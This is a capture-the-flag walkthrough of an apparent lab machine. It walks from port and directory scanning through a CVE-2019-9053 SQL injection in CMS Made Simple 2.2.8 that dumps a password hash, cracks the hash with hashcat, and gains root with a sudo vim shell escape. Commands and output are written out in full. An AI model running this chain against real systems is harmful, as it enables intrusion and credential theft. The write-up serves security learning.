RECON :
neo@0xneoxploit:~$ rustscan -a 10.10.160.152 --ulimit 5000 -- -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Open ports, closed hearts.
[~] The config file is expected to be at "/home/neo/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.160.152:21
Open 10.10.160.152:80
Open 10.10.160.152:2222
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sC -sV" on ip 10.10.160.152
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-28 05:09 EST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 05:09
Completed NSE at 05:09, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 05:09
Completed NSE at 05:09, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 05:09
Completed NSE at 05:09, 0.00s elapsed
Initiating Ping Scan at 05:09
Scanning 10.10.160.152 [4 ports]
Completed Ping Scan at 05:09, 0.20s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:09
Completed Parallel DNS resolution of 1 host. at 05:09, 0.12s elapsed
DNS resolution of 1 IPs took 0.12s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 05:09
Scanning 10.10.160.152 [3 ports]
Discovered open port 21/tcp on 10.10.160.152
Discovered open port 80/tcp on 10.10.160.152
Discovered open port 2222/tcp on 10.10.160.152
Completed SYN Stealth Scan at 05:09, 0.19s elapsed (3 total ports)
Initiating Service scan at 05:09
Scanning 3 services on 10.10.160.152
Completed Service scan at 05:09, 6.36s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.160.152.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 05:09
NSE: [ftp-bounce 10.10.160.152:21] PORT response: 500 Illegal PORT command.
NSE Timing: About 99.77% done; ETC: 05:09 (0:00:00 remaining)
Completed NSE at 05:09, 30.97s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 05:09
Completed NSE at 05:09, 1.15s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 05:09
Completed NSE at 05:09, 0.00s elapsed
Nmap scan report for 10.10.160.152
Host is up, received echo-reply ttl 63 (0.16s latency).
Scanned at 2025-02-28 05:09:11 EST for 38s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.14.96.143
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCj5RwZ5K4QU12jUD81IxGPdEmWFigjRwFNM2pVBCiIPWiMb+R82pdw5dQPFY0JjjicSysFN3pl8ea2L8acocd/7zWke6ce50tpHaDs8OdBYLfpkh+OzAsDwVWSslgKQ7rbi/ck1FF1LIgY7UQdo5FWiTMap7vFnsT/WHL3HcG5Q+el4glnO4xfMMvbRar5WZd4N0ZmcwORyXrEKvulWTOBLcoMGui95Xy7XKCkvpS9RCpJgsuNZ/oau9cdRs0gDoDLTW4S7OI9Nl5obm433k+7YwFeoLnuZnCzegEhgq/bpMo+fXTb/4ILI5bJHJQItH2Ae26iMhJjlFsMqQw0FzLf
| 256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM6Q8K/lDR5QuGRzgfrQSDPYBEBcJ+/2YolisuiGuNIF+1FPOweJy9esTtstZkG3LPhwRDggCp4BP+Gmc92I3eY=
| 256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ2I73yryK/Q6UFyvBBMUJEfznlIdBXfnrEqQ3lWdymK
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 05:09
Completed NSE at 05:09, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 05:09
Completed NSE at 05:09, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 05:09
Completed NSE at 05:09, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.31 seconds
Raw packets sent: 7 (284B) | Rcvd: 4 (160B)
so we can see 3 ports are open, ssh,ftp and http. on port 80 we don’t see anything interesting other than default apache server page so lets find some hidden directories:
┌──(neo㉿0xneoxploit)-[~]
└─$ gobuster dir -u http://10.10.160.152/ -w /usr/share/dirb/wordlists/big.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.160.152/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 297]
/.htpasswd (Status: 403) [Size: 297]
/robots.txt (Status: 200) [Size: 929]
/server-status (Status: 403) [Size: 301]
/simple (Status: 301) [Size: 315] [--> http://10.10.160.152/simple/]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================
so lets try /simple ,
So its running a website with CMS Made Simple version 2.2.8.
lets search for exploitdb :
┌──(neo㉿0xneoxploit)-[~]
└─$ searchsploit CMS Made Simple 2.2.8
-------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------- ---------------------------------
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(neo㉿0xneoxploit)-[~]
└─$ searchsploit -x php/webapps/46635.py
Exploit: CMS Made Simple < 2.2.10 - SQL Injection
URL: https://www.exploit-db.com/exploits/46635
Path: /usr/share/exploitdb/exploits/php/webapps/46635.py
Codes: CVE-2019-9053
Verified: False
File Type: Python script, ASCII text executable
SO we have to do a sqli exploit in here,lets runt the exploit :
┌──(neo㉿0xneoxploit)-[~/Tools/CVE-2019-9053-CMS-Made-Simple-2.2.10---SQL-Injection-Exploit]
└─$ python /usr/share/exploitdb/exploits/php/webapps/46635.py
File "/usr/share/exploitdb/exploits/php/webapps/46635.py", line 25
print "[+] Specify an url target"
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?
so yeah , had to swim on github to find another one : https://github.com/ELIZEUOPAIN/CVE-2019-9053-CMS-Made-Simple-2.2.10---SQL-Injection-Exploit
this worked for me :
┌──(neo㉿0xneoxploit)-[~/Tools/CVE-2019-9053-CMS-Made-Simple-2.2.10---SQL-Injection-Exploit]
└─$ python cve.py -u http://10.10.160.152/simple -w /usr/share/wordlists/rockyou.txt
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
lets crack using hashcat :
┌──(neo㉿0xneoxploit)-[~]
└─$ hashcat -m 20 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v6.2.6) starting
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================
* Device #1: cpu--0x000, 1435/2935 MB (512 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 2 secs
0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 20 (md5($salt.$pass))
Hash.Target......: 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2
Time.Started.....: Fri Feb 28 06:27:50 2025, (0 secs)
Time.Estimated...: Fri Feb 28 06:27:50 2025, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 11094 H/s (0.13ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1024/14344384 (0.01%)
Rejected.........: 0/1024 (0.00%)
Restore.Point....: 0/14344384 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> bethany
Hardware.Mon.#1..: Util: 25%
Started: Fri Feb 28 06:27:27 2025
Stopped: Fri Feb 28 06:27:52 2025
so login into ssh using this password and username and get the user.txt
ROOT
i ran linpeas.sh and found this :
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim
Explanation of vim -c ’:!/bin/sh’
This command exploits the fact that you can run shell commands from within Vim, and since vim is being executed with sudo, it inherits root privileges.
Breakdown of the Command:
-
vim → This launches the Vim text editor.
-
-c → This tells Vim to execute a command as soon as it starts.
-
’:!/bin/sh’
• : → Enters Vim command mode.
• ! → Tells Vim to execute an external shell command.
• /bin/sh → Launches a shell (which in this case will run as root, because Vim was executed with sudo).
What Happens?
• Since sudo vim is allowed without a password, you can run Vim as root.
• The -c ’:!/bin/sh’ forces Vim to immediately execute /bin/sh as root.
• You are now in a root shell (#).
Verify Root Access:
whoami
Expected output:
root
Alternative for a Fully Interactive Shell:
If you need a fully interactive TTY shell, after spawning /bin/sh, you can run:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Now you have a stable root shell. 🚀
now cat /root/root.txt